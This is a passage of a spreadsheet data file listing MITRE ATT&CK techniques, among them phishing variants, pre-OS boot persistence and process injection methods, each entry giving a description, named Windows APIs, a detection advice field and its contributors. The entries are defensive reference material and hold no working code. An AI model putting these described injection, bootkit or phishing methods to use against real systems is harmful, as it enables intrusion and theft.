Commands such as &lt;code&gt;net localgroup&lt;/code&gt; of the [Net](https://attack.mitre.org/software/S0039) utility, &lt;code&gt;dscl . -list /Groups&lt;/code&gt; on macOS, and &lt;code&gt;groups&lt;/code&gt; on Linux can list local groups.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1069/001</t>
  </si>
  <si>
    <t>T1566</t>
  </si>
  <si>
    <t>Phishing</t>
  </si>
  <si>
    <t>Adversaries may send phishing messages to gain access to victim systems.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malware spam campaigns.
Adversaries may send victims emails containing malicious attachments or links, typically to execute malicious code on victim systems. Phishing may also be conducted via third-party services, like social media platforms. Phishing may also involve social engineering techniques, such as posing as a trusted source.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1566</t>
  </si>
  <si>
    <t>Network intrusion detection systems and email gateways can be used to detect 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Because most common third-party services used for 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Many possible detections of follow-on behavior may take place once [User Execution](https://attack.mitre.org/techniques/T1204) occurs.</t>
  </si>
  <si>
    <t>Philip Winther</t>
  </si>
  <si>
    <t>T1598</t>
  </si>
  <si>
    <t>Phishing for Information</t>
  </si>
  <si>
    <t>Adversaries may send phishing messages to elicit sensitive information that can be used during targeting. Phishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Phishing for information is different from [Phishing](https://attack.mitre.org/techniques/T1566) in that the objective is gathering data from the victim rather than executing malicious code.
All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass credential harvesting campaigns.
Adversaries may also try to obtain information directly through the exchange of emails, instant messages, or other electronic conversation means.(Citation: ThreatPost Social Media Phishing)(Citation: TrendMictro Phishing)(Citation: PCMag FakeLogin)(Citation: Sophos Attachment)(Citation: GitHub Phishery) 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t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1598</t>
  </si>
  <si>
    <t>Depending on the specific method of phishing, the detections can vary. Monitor for suspicious email activity, such as numerous accounts receiving messages from a single unusual/unknown sender. Filtering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing)
When it comes to following links, monitor for references to uncategorized or known-bad sites. URL inspection within email (including expanding shortened links) can also help detect links leading to known malicious sites.
Monitor social media traffic for suspicious activity, including messages requesting information as well as abnormal file or data transfers (especially those involving unknown, or otherwise suspicious accounts).</t>
  </si>
  <si>
    <t>Philip Winther; Robert Simmons, @MalwareUtkonos; Sebastian Salla, McAfee</t>
  </si>
  <si>
    <t>T1598.002</t>
  </si>
  <si>
    <t>Phishing for Information: Spearphishing Attachment</t>
  </si>
  <si>
    <t>Adversaries may send spearphishing messages with a malicious attachment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attach a file to the spearphishing email and usually rely upon the recipient populating information then returning the file.(Citation: Sophos Attachment)(Citation: GitHub Phishery) The text of the spearphishing email usually tries to give a plausible reason why the file should be filled-in, such as a request for information from a business associate.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</si>
  <si>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https://attack.mitre.org/techniques/T1598/002</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</si>
  <si>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t>
  </si>
  <si>
    <t>T1598.003</t>
  </si>
  <si>
    <t>Phishing for Information: Spearphishing Link</t>
  </si>
  <si>
    <t>Adversaries may send spearphishing messages with a malicious link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the malicious emails contain links generally accompanied by social engineering text to coax the user to actively click or copy and paste a URL into a browser.(Citation: TrendMictro Phishing)(Citation: PCMag FakeLogin) The given website may closely resemble a legitimate site in appearance and have a URL containing elements from the real site. From the fake website, information is gathered in web forms and sent to the attacker. Adversaries may also use information from previous reconnaissance efforts (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)) to craft persuasive and believable lures.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1598/003</t>
  </si>
  <si>
    <t>Monitor for suspicious email activity, such as numerous accounts receiving messages from a single unusual/unknown sender. Filtering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing)
Monitor for references to uncategorized or known-bad sites. URL inspection within email (including expanding shortened links) can also help detect links leading to known malicious sites.</t>
  </si>
  <si>
    <t>T1598.001</t>
  </si>
  <si>
    <t>Phishing for Information: Spearphishing Service</t>
  </si>
  <si>
    <t>Adversaries may send spearphishing messages via third-party services to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.
All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries send messages through various social media services, personal webmail, and other non-enterprise controlled services.(Citation: ThreatPost Social Media Phishing) These services are more likely to have a less-strict security policy than an enterprise. As with most kinds of spearphishing, the goal is to generate rapport with the target or get the target's interest in some way. Adversaries may create fake social media accounts and message employees for potential job opportunities. Doing so allows a plausible reason for asking about services, policies, and information about their environment. Adversaries may also use information from previous reconnaissance efforts (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)) to craft persuasive and believable lures.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1598/001</t>
  </si>
  <si>
    <t>Monitor social media traffic for suspicious activity, including messages requesting information as well as abnormal file or data transfers (especially those involving unknown, or otherwise suspicious accounts).
Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.</t>
  </si>
  <si>
    <t>Robert Simmons, @MalwareUtkonos</t>
  </si>
  <si>
    <t>T1566.001</t>
  </si>
  <si>
    <t>Phishing: Spearphishing Attachment</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may send spearphishing emails with a malicious attachment in an attempt to gain access to victim systems. Spearphishing attachment is a specific variant of spearphishing. Spearphishing attachment is different from other forms of spearphishing in that it employs the use of malware attached to an email. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon [User Execution](https://attack.mitre.org/techniques/T1204) to gain execution. Spearphishing may also involve social engineering techniques, such as posing as a trusted source.
There are many options for the attachment such as Microsoft Office documents, executables, PDFs, or archived files. Upon opening the attachment (and potentially clicking past protections), the adversary's payload exploits a vulnerability or directly executes on the user's system. The text of the spearphishing email usually tries to give a plausible reason why the file should be opened, and may explain how to bypass system protections in order to do so. The email may also contain instructions on how to decrypt an attachment, such as a zip file password, in order to evade email boundary defenses. Adversaries frequently manipulate file extensions and icons in order to make attached executables appear to be document files, or files exploiting one application appear to be a file for a different one. </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1566/001</t>
  </si>
  <si>
    <t>Network intrusion detection systems and email gateways can be used to detect spearphishing with malicious attachments in transit. Detonation chambers may also be used to identify malicious attachments. Solutions can be signature and behavior based, but adversaries may construct attachments in a way to avoid these systems.
Filtering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing)
Anti-virus can potentially detect malicious documents and attachments as they're scanned to be stored on the email server or on the user's computer. Endpoint sensing or network sensing can potentially detect malicious events once the attachment is opened (such as a Microsoft Word document or PDF reaching out to the internet or spawning Powershell.exe) for techniques such as [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203) or usage of malicious scripts.
Monitor for suspicious descendant process spawning from Microsoft Office and other productivity software.(Citation: Elastic - Koadiac Detection with EQL)</t>
  </si>
  <si>
    <t>T1566.002</t>
  </si>
  <si>
    <t>Phishing: Spearphishing Link</t>
  </si>
  <si>
    <t>Adversaries may send spearphishing emails with a malicious link in an attempt to gain access to victim systems. Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments. Spearphishing may also involve social engineering techniques, such as posing as a trusted source.
All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this case, the malicious emails contain links. Generally, the links will be accompanied by social engineering text and require the user to actively click or copy and paste a URL into a browser, leveraging [User Execution](https://attack.mitre.org/techniques/T1204). The visited website may compromise the web browser using an exploit, or the user will be prompted to download applications, documents, zip files, or even executables depending on the pretext for the email in the first place. Adversaries may also include links that are intended to interact directly with an email reader, including embedded images intended to exploit the end system directly or verify the receipt of an email (i.e. web bugs/web beacons). Links may also direct users to malicious applications  designed to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s, like OAuth tokens, in order to gain access to protected applications and information.(Citation: Trend Micro Pawn Storm OAuth 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1566/002</t>
  </si>
  <si>
    <t>URL inspection within email (including expanding shortened links) can help detect links leading to known malicious sites. Detonation chambers can be used to detect these links and either automatically go to these sites to determine if they're potentially malicious, or wait and capture the content if a user visits the link.
Filtering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing)
Because this technique usually involves user interaction on the endpoint, many of the possible detections take place once [User Execution](https://attack.mitre.org/techniques/T1204) occurs.</t>
  </si>
  <si>
    <t>Jeff Sakowicz, Microsoft Identity Developer Platform Services (IDPM Services); Mark Wee; Philip Winther; Saisha Agrawal, Microsoft Threat Intelligent Center (MSTIC); Shailesh Tiwary (Indian Army)</t>
  </si>
  <si>
    <t>T1566.003</t>
  </si>
  <si>
    <t>Phishing: Spearphishing via Service</t>
  </si>
  <si>
    <t>Adversaries may send spearphishing messages via third-party services in an attempt to gain access to victim systems. Spearphishing via service is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of third party services rather than directly via enterprise email channels. 
All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries send messages through various social media services, personal webmail, and other non-enterprise controlled services. These services are more likely to have a less-strict security policy than an enterprise. As with most kinds of spearphishing, the goal is to generate rapport with the target or get the target's interest in some way. Adversaries will create fake social media accounts and message employees for potential job opportunities. Doing so allows a plausible reason for asking about services, policies, and software that's running in an environment. The adversary can then send malicious links or attachments through these services.
A common example is to build rapport with a target via social media, then send content to a personal webmail service that the target uses on their work computer. This allows an adversary to bypass some email restrictions on the work account, and the target is more likely to open the file since it's something they were expecting. If the payload doesn't work as expected, the adversary can continue normal communications and troubleshoot with the target on how to get it working.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1566/003</t>
  </si>
  <si>
    <t>18 October 2020</t>
  </si>
  <si>
    <t>Because most common third-party services used for spearphishing via service leverage TLS encryption, SSL/TLS inspection is generally required to detect the initial communication/delivery. With SSL/TLS inspection intrusion detection signatures or other security gateway appliances may be able to detect malware. 
Anti-virus can potentially detect malicious documents and files that are downloaded on the user's computer. Endpoint sensing or network sensing can potentially detect malicious events once the file is opened (such as a Microsoft Word document or PDF reaching out to the internet or spawning Powershell.exe) for techniques such as [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203) or usage of malicious scripts.</t>
  </si>
  <si>
    <t>T1542</t>
  </si>
  <si>
    <t>Pre-OS Boot</t>
  </si>
  <si>
    <t>Adversaries may abuse Pre-OS Boot mechanisms as a way to establish persistence on a system. During the booting process of a computer, firmware and various startup services are loaded before the operating system. These programs control flow of execution before the operating system takes control.(Citation: Wikipedia Booting)
Adversaries may overwrite data in boot drivers or firmware such as BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) to persist on systems at a layer below the operating system. This can be particularly difficult to detect as malware at this level will not be detected by host software-based defenses.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1542</t>
  </si>
  <si>
    <t>13 November 2019</t>
  </si>
  <si>
    <t>Perform integrity checking on pre-OS boot mechanisms that can be manipulated for malicious purposes. Take snapshots of boot records and firmware and compare against known good images. Log changes to boot records, BIOS, and EFI, which can be performed by API calls, and compare against known good behavior and patching.
Disk check, forensic utilities, and data from device drivers (i.e. processes and API calls) may reveal anomalies that warrant deeper investigation. (Citation: ITWorld Hard Disk Health Dec 2014)</t>
  </si>
  <si>
    <t>Linux, Network, Windows</t>
  </si>
  <si>
    <t>Command: Command Execution, Drive: Drive Modification, Driver: Driver Metadata, Firmware: Firmware Modification, Network Traffic: Network Connection Creation, Process: OS API Execution</t>
  </si>
  <si>
    <t>Anti-virus, File monitoring, Host intrusion prevention systems</t>
  </si>
  <si>
    <t>T1542.003</t>
  </si>
  <si>
    <t>Pre-OS Boot: Bootkit</t>
  </si>
  <si>
    <t>Adversaries may use bootkits to persist on systems. Bootkits reside at a layer below the operating system and may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly.
A bootkit is a malware variant that modifies the boot sectors of a hard drive, including the Master Boot Record (MBR) and Volume Boot Record (VBR). (Citation: Mandiant M Trends 2016) The MBR is the section of disk that is first loaded after completing hardware initialization by the BIOS. It is the location of the boot loader. An adversary who has raw access to the boot drive may overwrite this area, diverting execution during startup from the normal boot loader to adversary code. (Citation: Lau 2011)
The MBR passes control of the boot process to the VBR. Similar to the case of MBR, an adversary who has raw access to the boot drive may overwrite the VBR to divert execution during startup to adversary code.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1542/003</t>
  </si>
  <si>
    <t>19 December 2019</t>
  </si>
  <si>
    <t>Perform integrity checking on MBR and VBR. Take snapshots of MBR and VBR and compare against known good samples. Report changes to MBR and VBR as they occur for indicators of suspicious activity and further analysis.</t>
  </si>
  <si>
    <t>Drive: Drive Modification</t>
  </si>
  <si>
    <t>T1542.002</t>
  </si>
  <si>
    <t>Pre-OS Boot: Component Firmware</t>
  </si>
  <si>
    <t>Adversaries may modify component firmware to persist on systems. Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to [System Firmware](https://attack.mitre.org/techniques/T1542/001) but conducted upon other system components/devices that may not have the same capability or level of integrity checking.
Malicious component firmware could provide both a persistent level of access to systems despite potential typical failures to maintain access and hard disk re-images, as well as a way to evade host software-based defenses and integrity checks.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1542/002</t>
  </si>
  <si>
    <t>Data and telemetry from use of device drivers (i.e. processes and API calls) and/or provided by SMART (Self-Monitoring, Analysis and Reporting Technology) (Citation: SanDisk SMART) (Citation: SmartMontools) disk monitoring may reveal malicious manipulations of components. Otherwise, this technique may be difficult to detect since malicious activity is taking place on system components possibly outside the purview of OS security and integrity mechanisms.
Disk check and forensic utilities (Citation: ITWorld Hard Disk Health Dec 2014) may reveal indicators of malicious firmware such as strings, unexpected disk partition table entries, or blocks of otherwise unusual memory that warrant deeper investigation. Also consider comparing components, including hashes of component firmware and behavior, against known good images.</t>
  </si>
  <si>
    <t>Driver: Driver Metadata, Firmware: Firmware Modification, Process: OS API Execution</t>
  </si>
  <si>
    <t>T1542.004</t>
  </si>
  <si>
    <t>Pre-OS Boot: ROMMONkit</t>
  </si>
  <si>
    <t>Adversaries may abuse the ROM Monitor (ROMMON) by loading an unauthorized firmware with adversary code to provide persistent access and manipulate device behavior that is difficult to detect. (Citation: Cisco Synful Knock Evolution)(Citation: Cisco Blog Legacy Device Attacks)
ROMMON is a Cisco network device firmware that functions as a boot loader, boot image, or boot helper to initialize hardware and software when the platform is powered on or reset. Similar to [TFTP Boot](https://attack.mitre.org/techniques/T1542/005), an adversary may upgrade the ROMMON image locally or remotely (for example, through TFTP) with adversary code and restart the device in order to overwrite the existing ROMMON image. This provides adversaries with the means to update the ROMMON to gain persistence on a system in a way that may be difficult to detect.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1542/004</t>
  </si>
  <si>
    <t>There are no documented means for defenders to validate the operation of the ROMMON outside of vendor support. If a network device is suspected of being compromised, contact the vendor to assist in further investigation.</t>
  </si>
  <si>
    <t>T1542.001</t>
  </si>
  <si>
    <t>Pre-OS Boot: System Firmware</t>
  </si>
  <si>
    <t>Adversaries may modify system firmware to persist on systems.The BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer. (Citation: Wikipedia BIOS) (Citation: Wikipedia UEFI) (Citation: About UEFI)
System firmware like BIOS and (U)EFI underly the functionality of a computer and may be modified by an adversary to perform or assist in malicious activity. Capabilities exist to overwrite the system firmware, which may give sophisticated adversaries a means to install malicious firmware updates as a means of persistence on a system that may be difficult to detect.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1542/001</t>
  </si>
  <si>
    <t>19 May 2020</t>
  </si>
  <si>
    <t>System firmware manipulation may be detected. (Citation: MITRE Trustworthy Firmware Measurement) Dump and inspect BIOS images on vulnerable systems and compare against known good images. (Citation: MITRE Copernicus) Analyze differences to determine if malicious changes have occurred. Log attempts to read/write to BIOS and compare against known patching behavior.
Likewise, EFI modules can be collected and compared against a known-clean list of EFI executable binaries to detect potentially malicious modules. The CHIPSEC framework can be used for analysis to determine if firmware modifications have been performed. (Citation: McAfee CHIPSEC Blog) (Citation: Github CHIPSEC) (Citation: Intel HackingTeam UEFI Rootkit)</t>
  </si>
  <si>
    <t>Jean-Ian Boutin, ESET; McAfee; Ryan Becwar</t>
  </si>
  <si>
    <t>T1542.005</t>
  </si>
  <si>
    <t>Pre-OS Boot: TFTP Boot</t>
  </si>
  <si>
    <t>Adversaries may abuse netbooting to load an unauthorized network device operating system from a Trivial File Transfer Protocol (TFTP) server. TFTP boot (netbooting) is commonly used by network administrators to load configuration-controlled network device images from a centralized management server. Netbooting is one option in the boot sequence and can be used to centralize, manage, and control device images.
Adversaries may manipulate the configuration on the network device specifying use of a malicious TFTP server, which may be used in conjunction with [Modify System Image](https://attack.mitre.org/techniques/T1601) to load a modified image on device startup or reset. The unauthorized image allows adversaries to modify device configuration, add malicious capabilities to the device, and introduce backdoors to maintain control of the network device while minimizing detection through use of a standard functionality. This technique is similar to [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) and may result in the network device running a modified image. (Citation: Cisco Blog Legacy Device Attacks)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1542/005</t>
  </si>
  <si>
    <t>Consider comparing a copy of the network device configuration and system image against a known-good version to discover unauthorized changes to system boot, startup configuration, or the running OS. (Citation: Cisco IOS Software Integrity Assurance - Secure Boot) (Citation: Cisco IOS Software Integrity Assurance - Image File Verification)The same process can be accomplished through a comparison of the run-time memory, though this is non-trivial and may require assistance from the vendor.  (Citation: Cisco IOS Software Integrity Assurance - Run-Time Memory Verification)
Review command history in either the console or as part of the running memory to determine if unauthorized or suspicious commands were used to modify device configuration. (Citation: Cisco IOS Software Integrity Assurance - Command History) Check boot information including system uptime, image booted, and startup configuration to determine if results are consistent with expected behavior in the environment. (Citation: Cisco IOS Software Integrity Assurance - Boot Information) Monitor unusual connections or connection attempts to the device that may specifically target TFTP or other file-sharing protocols.</t>
  </si>
  <si>
    <t>Command: Command Execution, Firmware: Firmware Modification, Network Traffic: Network Connection Creation</t>
  </si>
  <si>
    <t>T1057</t>
  </si>
  <si>
    <t>Process Discovery</t>
  </si>
  <si>
    <t>Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from [Process Discovery](https://attack.mitre.org/techniques/T1057) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
In Windows environments, adversaries could obtain details on running processes using the [Tasklist](https://attack.mitre.org/software/S0057) utility via [cmd](https://attack.mitre.org/software/S0106) or &lt;code&gt;Get-Process&lt;/code&gt; via [PowerShell](https://attack.mitre.org/techniques/T1059/001). Information about processes can also be extracted from the output of [Native API](https://attack.mitre.org/techniques/T1106) calls such as &lt;code&gt;CreateToolhelp32Snapshot&lt;/code&gt;. In Mac and Linux, this is accomplished with the &lt;code&gt;ps&lt;/code&gt; command. Adversaries may also opt to enumerate processes via /proc.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1057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</si>
  <si>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that look like process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</si>
  <si>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T1055</t>
  </si>
  <si>
    <t>Process Injection</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process. 
There are many different ways to inject code into a process, many of which abuse legitimate functionalities. These implementations exist for every major OS but are typically platform specific. 
More sophisticated samples may perform multiple process injections to segment modules and further evade detection, utilizing named pipes or other inter-process communication (IPC) mechanisms as a communication channel. </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1055</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</si>
  <si>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Monitor for named pipe creation and connection events (Event IDs 17 and 18) for possible indicators of infected processes with external modules.(Citation: Microsoft Sysmon v6 May 2017) 
Analyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. </t>
  </si>
  <si>
    <t>File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access</t>
  </si>
  <si>
    <t>Anastasios Pingios; Christiaan Beek, @ChristiaanBeek; Ryan Becwar</t>
  </si>
  <si>
    <t>T1055.004</t>
  </si>
  <si>
    <t>Process Injection: Asynchronous Procedure Call</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may inject malicious code into processes via the asynchronous procedure call (APC) queue in order to evade process-based defenses as well as possibly elevate privileges. APC injection is a method of executing arbitrary code in the address space of a separate live process. 
APC injection is commonly performed by attaching malicious code to the APC Queue (Citation: Microsoft APC) of a process's thread. Queued APC functions are executed when the thread enters an alterable state.(Citation: Microsoft APC) A handle to an existing victim process is first created with native Windows API calls such as &lt;code&gt;OpenThread&lt;/code&gt;. At this point &lt;code&gt;QueueUserAPC&lt;/code&gt; can be used to invoke a function (such as &lt;code&gt;LoadLibrayA&lt;/code&gt; pointing to a malicious DLL). 
A variation of APC injection, dubbed "Early Bird injection", involves creating a suspended process in which malicious code can be written and executed before the process' entry point (and potentially subsequent anti-malware hooks) via an APC. (Citation: CyberBit Early Bird Apr 2018) AtomBombing (Citation: ENSIL AtomBombing Oct 2016) is another variation that utilizes APCs to invoke malicious code previously written to the global atom table.(Citation: Microsoft Atom Table)
Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via APC injection may also evade detection from security products since the execution is masked under a legitimate process. </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1055/004</t>
  </si>
  <si>
    <t>14 January 2020</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</si>
  <si>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&lt;code&gt;SuspendThread&lt;/code&gt;/&lt;code&gt;SetThreadContext&lt;/code&gt;/&lt;code&gt;ResumeThread&lt;/code&gt;, &lt;code&gt;QueueUserAPC&lt;/code&gt;/&lt;code&gt;NtQueueApcThread&lt;/code&gt;,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</si>
  <si>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Process: OS API Execution, Process: Process Access</t>
  </si>
  <si>
    <t>T1055.001</t>
  </si>
  <si>
    <t>Process Injection: Dynamic-link Library Injection</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may inject dynamic-link libraries (DLLs) into processes in order to evade process-based defenses as well as possibly elevate privileges. DLL injection is a method of executing arbitrary code in the address space of a separate live process.  
DLL injection is commonly performed by writing the path to a DLL in the virtual address space of the target process before loading the DLL by invoking a new thread. The write can be performed with native Windows API calls such as &lt;code&gt;VirtualAllocEx&lt;/code&gt; and &lt;code&gt;WriteProcessMemory&lt;/code&gt;, then invoked with &lt;code&gt;CreateRemoteThread&lt;/code&gt; (which calls the &lt;code&gt;LoadLibrary&lt;/code&gt; API responsible for loading the DLL). (Citation: Elastic Process Injection July 2017) 
Variations of this method such as reflective DLL injection (writing a self-mapping DLL into a process) and memory module (map DLL when writing into process) overcome the address relocation issue as well as the additional APIs to invoke execution (since these methods load and execute the files in memory by manually preforming the function of &lt;code&gt;LoadLibrary&lt;/code&gt;).(Citation: Elastic HuntingNMemory June 2017)(Citation: Elastic Process Injection July 2017) 
Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via DLL injection may also evade detection from security products since the execution is masked under a legitimate process. </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1055/001</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</si>
  <si>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Monitor DLL/PE file events, specifically creation of these binary files as well as the loading of DLLs into processes. Look for DLLs that are not recognized or not normally loaded into a process. 
Analyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. </t>
  </si>
  <si>
    <t>Module: Module Load, Process: OS API Execution, Process: Process Access</t>
  </si>
  <si>
    <t>T1055.011</t>
  </si>
  <si>
    <t>Process Injection: Extra Window Memory Injection</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process. 
Before creating a window, graphical Windows-based processes must prescribe to or register a windows class, which stipulate appearance and behavior (via windows procedures, which are functions that handle input/output of data).(Citation: Microsoft Window Classes) Registration of new windows classes can include a request for up to 40 bytes of EWM to be appended to the allocated memory of each instance of that class. This EWM is intended to store data specific to that window and has specific application programming interface (API) functions to set and get its value. (Citation: Microsoft GetWindowLong function) (Citation: Microsoft SetWindowLong function)
Although small, the EWM is large enough to store a 32-bit pointer and is often used to point to a windows procedure. Malware may possibly utilize this memory location in part of an attack chain that includes writing code to shared sections of the process’s memory, placing a pointer to the code in EWM, then invoking execution by returning execution control to the address in the process’s EWM.
Execution granted through EWM injection may allow access to both the target process's memory and possibly elevated privileges. Writing payloads to shared sections also avoids the use of highly monitored API calls such as &lt;code&gt;WriteProcessMemory&lt;/code&gt; and &lt;code&gt;CreateRemoteThread&lt;/code&gt;.(Citation: Elastic Process Injection July 2017) More sophisticated malware samples may also potentially bypass protection mechanisms such as data execution prevention (DEP) by triggering a combination of windows procedures and other system functions that will rewrite the malicious payload inside an executable portion of the target process.  (Citation: MalwareTech Power Loader Aug 2013) (Citation: WeLiveSecurity Gapz and Redyms Mar 2013)
Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via EWM injection may also evade detection from security products since the execution is masked under a legitimate process. </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1055/011</t>
  </si>
  <si>
    <t>Monitor for API calls related to enumerating and manipulating EWM such as GetWindowLong (Citation: Microsoft GetWindowLong function) and SetWindowLong (Citation: Microsoft SetWindowLong function). Malware associated with this technique have also used SendNotifyMessage (Citation: Microsoft SendNotifyMessage function) to trigger the associated window procedure and eventual malicious injection. (Citation: Elastic Process Injection July 2017)</t>
  </si>
  <si>
    <t>Process: OS API Execution</t>
  </si>
  <si>
    <t>T1055.002</t>
  </si>
  <si>
    <t>Process Injection: Portable Executable Injection</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may inject portable executables (PE) into processes in order to evade process-based defenses as well as possibly elevate privileges. PE injection is a method of executing arbitrary code in the address space of a separate live process. 
PE injection is commonly performed by copying code (perhaps without a file on disk) into the virtual address space of the target process before invoking it via a new thread. The write can be performed with native Windows API calls such as &lt;code&gt;VirtualAllocEx&lt;/code&gt; and &lt;code&gt;WriteProcessMemory&lt;/code&gt;, then invoked with &lt;code&gt;CreateRemoteThread&lt;/code&gt; or additional code (ex: shellcode). The displacement of the injected code does introduce the additional requirement for functionality to remap memory references. (Citation: Elastic Process Injection July 2017) 
Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via PE injection may also evade detection from security products since the execution is masked under a legitimate process. </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1055/002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</si>
  <si>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</si>
  <si>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T1055.009</t>
  </si>
  <si>
    <t>Process Injection: Proc Memory</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may inject malicious code into processes via the /proc filesystem in order to evade process-based defenses as well as possibly elevate privileges. Proc memory injection is a method of executing arbitrary code in the address space of a separate live process. 
Proc memory injection involves enumerating the memory of a process via the /proc filesystem (&lt;code&gt;/proc/[pid]&lt;/code&gt;) then crafting a return-oriented programming (ROP) payload with available gadgets/instructions. Each running process has its own directory, which includes memory mappings. Proc memory injection is commonly performed by overwriting the target processes’ stack using memory mappings provided by the /proc filesystem. This information can be used to enumerate offsets (including the stack) and gadgets (or instructions within the program that can be used to build a malicious payload) otherwise hidden by process memory protections such as address space layout randomization (ASLR). Once enumerated, the target processes’ memory map within &lt;code&gt;/proc/[pid]/maps&lt;/code&gt; can be overwritten using dd.(Citation: Uninformed Needle)(Citation: GDS Linux Injection)(Citation: DD Man) 
Other techniques such as [Dynamic Linker Hijacking](https://attack.mitre.org/techniques/T1574/006) may be used to populate a target process with more available gadgets. Similar to [Process Hollowing](https://attack.mitre.org/techniques/T1055/012), proc memory injection may target child processes (such as a backgrounded copy of sleep).(Citation: GDS Linux Injection) 
Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via proc memory injection may also evade detection from security products since the execution is masked under a legitimate process. </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1055/009</t>
  </si>
  <si>
    <t xml:space="preserve">File system monitoring can determine if /proc files are being modified. Users should not have permission to modify these in most cases. 
Analyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. </t>
  </si>
  <si>
    <t>T1055.013</t>
  </si>
  <si>
    <t>Process Injection: Process Doppelgänging</t>
  </si>
  <si>
